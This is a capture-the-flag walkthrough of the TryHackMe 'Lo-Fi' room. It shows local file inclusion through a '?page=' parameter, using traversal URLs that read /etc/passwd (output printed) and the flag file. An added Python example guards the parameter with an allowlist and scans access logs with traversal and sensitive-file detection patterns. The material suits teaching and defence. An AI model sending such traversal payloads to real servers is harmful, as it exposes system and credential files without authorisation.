Lo-Fi | TryHackMe | Walkthrough | Easy

Room: https://tryhackme.com/r/room/lofi

As mentioned on the challenge page, we just have to visit the URL http://<Machine_IP>.

Looking around, we see that the links in the “Discography” section open like this:

http://10.10.229.128/?page=relax.php

The page parameter takes a file name, so we immediately check for LFI (local file inclusion) by replacing it with a traversal path, and it works:

http://10.10.229.128/?page=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh

As mentioned on the challenge page, the flag is in the root of the filesystem, so we just have to request

http://10.10.229.128/?page=../../../../../flag.txt

and we get the flag.
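As an added, defender-side example (not part of the original write-up or the room): the root cause here is a page parameter handed straight to a file include, so the fix is to accept only an allowlisted page name, and the traversal used above is easy to spot in the web server's access log. The Python below does both; the allowed page names, the base directory and the access-log lines are constructed for illustration.

```python
"""Allowlist guard for a ?page= include, plus a log check for traversal.

Added example (not from the original write-up). The allowlist, base
directory and sample log lines are constructed, not taken from the room.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed: the only pages the application is meant to serve.
ALLOWED_PAGES = {"relax", "chill", "study"}


def resolve_page(page_param: str,
                 base_dir: str = "/var/www/html/pages") -> Optional[str]:
    """Map the untrusted page value to a file path, or None if rejected.

    The vulnerable pattern is include($_GET['page']) with no check, which
    is what lets ../../../../../etc/passwd through. Here the value must be
    a bare name from the allowlist, so no user-supplied path characters
    ever reach the filesystem.
    """
    name = page_param.removesuffix(".php")
    if not re.fullmatch(r"[a-z0-9_-]+", name):
        return None
    if name not in ALLOWED_PAGES:
        return None
    return f"{base_dir}/{name}.php"


# Apache/nginx combined-log format: client, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)


def lfi_indicators(request_target: str) -> List[str]:
    """Return the reasons a request's page value looks like file inclusion."""
    query = parse_qs(urlsplit(request_target).query)
    reasons = []
    for raw in query.get("page", []):
        # Decode twice so percent-encoded and double-encoded dots are seen.
        value = unquote(unquote(raw))
        if ".." in value:
            reasons.append("traversal")
        if value.startswith("/"):
            reasons.append("absolute path")
        if re.search(r"/etc/(passwd|shadow)|\.ssh/|flag", value):
            reasons.append("sensitive target")
    return sorted(set(reasons))


def flag_log_lines(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Parse combined-format log lines and return (ip, target, reasons) hits."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        reasons = lfi_indicators(match["target"])
        if reasons:
            hits.append((match["ip"], match["target"], reasons))
    return hits


# Constructed sample access-log lines: one normal request, two traversals.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?page=relax.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:12:00:07 +0000] "GET /?page=../../../../../etc/passwd HTTP/1.1" 200 1902 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:12:00:12 +0000] "GET /?page=%2e%2e%2f%2e%2e%2fflag.txt HTTP/1.1" 200 41 "-" "curl/8.0"',
]

if __name__ == "__main__":
    print(resolve_page("relax.php"))                  # allowed page
    print(resolve_page("../../../../../etc/passwd"))  # None: rejected
    for ip, target, reasons in flag_log_lines(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(reasons)}")
```

The allowlist is deliberately stricter than a realpath check: even a well-formed name that is not on the list is refused, so adding a new page is an explicit code change rather than a file drop. The log check decodes the parameter twice before looking at it, because a single decode misses double-encoded traversal sequences.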

One of the easiest boxes ever!


Written by Mohammad Shadab Shaikh


New to ethical hacking, exploring the world of cybersecurity to make the digital space safer for everyone. eJPT | Top 1% on TryHackMe
